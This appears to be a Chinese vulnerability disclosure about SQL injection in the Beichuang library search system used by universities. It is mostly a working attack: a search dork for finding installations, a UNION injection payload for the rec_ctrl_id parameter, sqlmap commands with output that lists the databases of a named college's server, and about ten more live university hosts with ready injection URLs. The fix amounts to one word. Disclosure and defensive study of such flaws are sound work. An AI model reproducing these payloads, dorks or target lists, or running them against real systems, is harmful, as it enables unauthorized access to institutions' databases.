北创图书检索系统某处过滤不严导致SQL注入,影响众多高校
百度搜索:inurl:/opac_two/search2
注入链接: /opac_two/search2/shelves_checkout.jsp?library_id= &rec_ctrl_id=
注入参数: rec_ctrl_id
Payload: library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL-- (基于mssql数据库)
以北京女子学院http://219.242.31.130:8080/opac_two/作为测试案例
测试链接: http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665
(1)UNION注入
http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(2)sqlmap注入
$ py sqlmap.py -u 'http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --random-agent --dbs -v 1 --batch
---
Place: GET
Parameter: rec_ctrl_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8430=8430 AND 'LBSb'='LBSb
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: library_id=A&rec_ctrl_id=0195033665' UNION ALL SELECT NULL,CHAR(113)+CHAR(110)+CHAR(99)+CHAR(112)+CHAR(113)+CHAR(86)+CHAR(102)+CHAR(72)+CHAR(89)+CHAR(
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8352=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sy
---
[18:13:54] [INFO] testing Microsoft SQL Server
[18:13:54] [INFO] confirming Microsoft SQL Server
[18:14:00] [WARNING] reflective value(s) found and filtering out
[18:14:10] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server Unknown
[18:14:14] [INFO] fetching database names
available databases [6]:
[*] master
[*] melinets
[*] model
[*] sybsystemdb
[*] sybsystemprocs
[*] tempdb
其他测试案例:(基于mssql数据库)
(1)http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
py sqlmap.py -u 'http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --technique=U --union-cols=9 --dbms mssql --dbs --batch
(2)http://202.118.84.134:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(3)http://219.218.26.4:85/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(4)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(5)http://218.107.150.8/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(6)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(7)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(8)http://202.118.84.134:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(9)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(10)http://218.107.150.8/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
解决方案:
过滤